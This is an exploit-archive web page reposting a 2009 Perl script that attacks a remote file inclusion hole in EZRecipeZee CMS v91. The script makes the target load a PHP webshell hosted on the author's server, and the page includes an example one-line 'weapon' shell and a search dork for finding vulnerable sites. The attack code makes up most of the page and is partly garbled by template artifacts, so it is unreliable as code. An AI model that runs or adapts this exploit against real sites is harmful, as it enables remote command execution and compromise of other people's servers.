首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EZRecipeZee version 91 CMS suffers from a remote file inclusion vulnerability
来源:http://www.indonesiancoder.com/ 作者:kaMtiEz 发布时间:2009-10-13  
#!/usr/bin/perl

#####
# [+] Author	: kaMtiEz (kamzcrew@gmail.com)
# [+] Date 	: September 30, 2009
# [+] Homepage	: http://www.indonesiancoder.com
# [+] Vendor 	: http://www.jdtmmsm.com/
# [+] Download 	: http://www.jdtmmsm.com/downloads/index.php?setFilter=11232
# [+] version 	: v91
# [+] Method	: Remote File Inclusion 
# [+] Dork 	: "Kill-9"+"IndonesianCoder"
# [+] Location 	: INDONESIA
# [~] Notes	:
# makasih buad babe and enyak ma ade .... muach ..
# sayang jangan marah dong .. maaf kemarin bangun jam 8 malem .. :(
# buat vycOd kuliah coy ojo fbnan wae ! wkwkwkwk
# pagi jam 10 ditemani don tukulesto .. dan setelah mencoba akhirnya dapet vuln .. zzzzzzzzzzzzzzzzz
# [~] Usage	:
# perl kaMz.pl <target> <weapon url> <cmd>
# perl kaMz.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system(
___FCKpd___0
GET['cmd']); ?> ##### use HTTP::Request; use LWP::UserAgent; $Tux = $ARGV[0]; $Pathloader = $ARGV[1]; $oliv = $ARGV[2]; if($Tux!~/http:\/\// || $Pathloader!~/http:\/\// || !$oliv){usage()} head(); sub head() { print "[X]============================================================================[X]\r\n"; print " | EZRecipeZee CMS Remote File Inclusion | \r\n"; print "[X]============================================================================[X]\r\n"; } while() { print "[w00t] \___FCKpd___0quot;; while(<STDIN>) { $kamz=
___FCKpd___0
; chomp($kamz); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Tux.'config/config.php?cfg[prePath]='.$Pathloader.'?&'.$oliv.'='.$kamz)or die "\nCould Not connect\n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[�]/; if (!$kamz) {print "\nPlease Enter a Command\n\n"; $return ="";} elsif ($return =~/failed to open stream: HTTP request denied!/ || $return =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($return =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[�]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[w00t] \___FCKpd___0quot;;}}}last; sub usage() { head(); print " | Usage: perl kaMz.pl <target> <weapon url> <cmd> |\r\n"; print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n"; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n"; print " | <cmd> - Command variable used in php shell |\r\n"; print "[X]============================================================================[X]\r\n"; print " | IndonesianCoder Team | KILL-9 CREW | KIRIK CREW | AntiSecurity.org |\r\n"; print " | tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n"; print " | Jack-, Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz |\r\n"; print " | Coracore, black666girl, NepT, ichal, tengik, och3_an3h, rendy and YOU!! |\r\n"; print "[X]============================================================================[X]\r\n"; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm | \r\n"; print "[X]============================================================================[X]\r\n"; exit(); }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EZsneezyCal CMS version 95.1 t
·ProFTPd version 1.3.0 mod_ctrl
·ZoIPer Call-Info remote denial
·Millenium MP3 Studio version 2
·Xion Audio Player local buffer
·Millenium MP3 Studio version 2
·Spider Solitaire local crash p
·HTTPDX h_handlepeer() Function
·FreeBSD version 7.2 VFS/devfs
·Xpdf - Integer overflow which
·FreeBSD <= 6.4 pipeclose()/knl
·CVE-2009-3692 Sun VirtualBox <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved